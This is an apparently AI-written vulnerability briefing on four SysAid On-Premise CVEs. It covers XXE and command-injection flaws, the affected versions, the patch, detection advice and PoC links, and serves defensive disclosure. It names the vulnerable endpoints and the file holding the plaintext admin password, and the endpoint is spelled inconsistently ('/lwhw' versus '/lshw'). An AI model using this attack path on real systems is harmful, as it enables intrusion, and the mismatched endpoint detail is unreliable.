Full Report
Cybersecurity researchers have disclosed multiple security flaw in the on-premise version of SysAid IT support software that could be exploited to achieve pre-authenticated remote code execution with elevated privileges. The vulnerabilities, tracked as CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777, have all been described as XML External Entity (XXE) injections, which occur when an attacker is
Analysis Summary
As a vulnerability research specialist, here is the summarized, actionable briefing based on the provided context:
# Vulnerability: Multiple Pre-Authentication RCE Flaws in SysAid On-Premise via XXE Chaining
## CVE Details
- CVE ID: CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778
- CVSS Score: Not explicitly provided, but exploitation leading to RCE and disclosure of admin credentials implies **Critical** severity.
- CWE: XXE (XML External Entity Injection) for the first three; Command Injection for the fourth.
## Affected Systems
- Products: SysAid On-Premise IT support software
- Versions: Prior to **24.4.60 b16**
- Configurations: Any deployed on-premise instance.
## Vulnerability Description
SysAid's on-premise solution is affected by four critical vulnerabilities, three of which (CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777) are **pre-authenticated XML External Entity (XXE) injections**.
1. **CVE-2025-2775 & CVE-2025-2776:** XXE flaw in the `/mdm/checkin` endpoint.
2. **CVE-2025-2777:** XXE flaw in the `/lwhw` endpoint.
These XXE flaws can be leveraged to execute **Server-Side Request Forgery (SSRF)** attacks and, critically, allow an attacker to retrieve sensitive local files, such as `InitAccount.cmd`, which contains the **plaintext password** for the initial administrator account. This allows an attacker to gain full administrative access.
The XXE flaws can be **chained** with a separate, independent command injection vulnerability (**CVE-2025-2778**) to achieve **Remote Code Execution (RCE)** on the host system with elevated privileges.
## Exploitation
- Status: PoC available (combining all four flaws). The attacks are trivial to execute.
- Complexity: **Low** (Requires only a specially crafted HTTP POST request).
- Attack Vector: **Network** (Pre-authenticated, accessible remotely).
## Impact
- Confidentiality: **High** (Access to administrator credentials and sensitive system files).
- Integrity: **High** (Ability to chain into RCE allows modification of system state).
- Availability: **High** (RCE can lead to service disruption or control).
## Remediation
### Patches
- **SysAid On-Premise Version 24.4.60 b16** (Released in early March 2025). Users must upgrade to this version or newer.
### Workarounds
- No specific workarounds were detailed in the summary, but **immediate patching is strongly recommended.** Network segmentation or strict ingress filtering on endpoints related to MDM checks might offer temporary protection, though the primary fix is upgrading.
## Detection
- **Indicators of Compromise (IoCs):** Anomalous outbound connections originating from the SysAid server process attempting to access internal files (due to SSRF/XXE) or execution of system commands not typical of IT service operations.
- **Detection Methods and Tools:** Monitoring web server logs for suspicious POST requests against `/mdm/checkin` and `/lshw` containing XML entity declarations, and monitoring for file access to configuration files like `InitAccount.cmd`.
## References
- Vendor Advisory (Patch Information): hxxps://documentation.sysaid.com/docs/24-40-60
- Exploitation Details/Research: hxxps://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
- Proof-of-Concept (PoC): hxxps://github.com/watchtowrlabs/watchTowr-vs-SysAid-PreAuth-RCE-Chain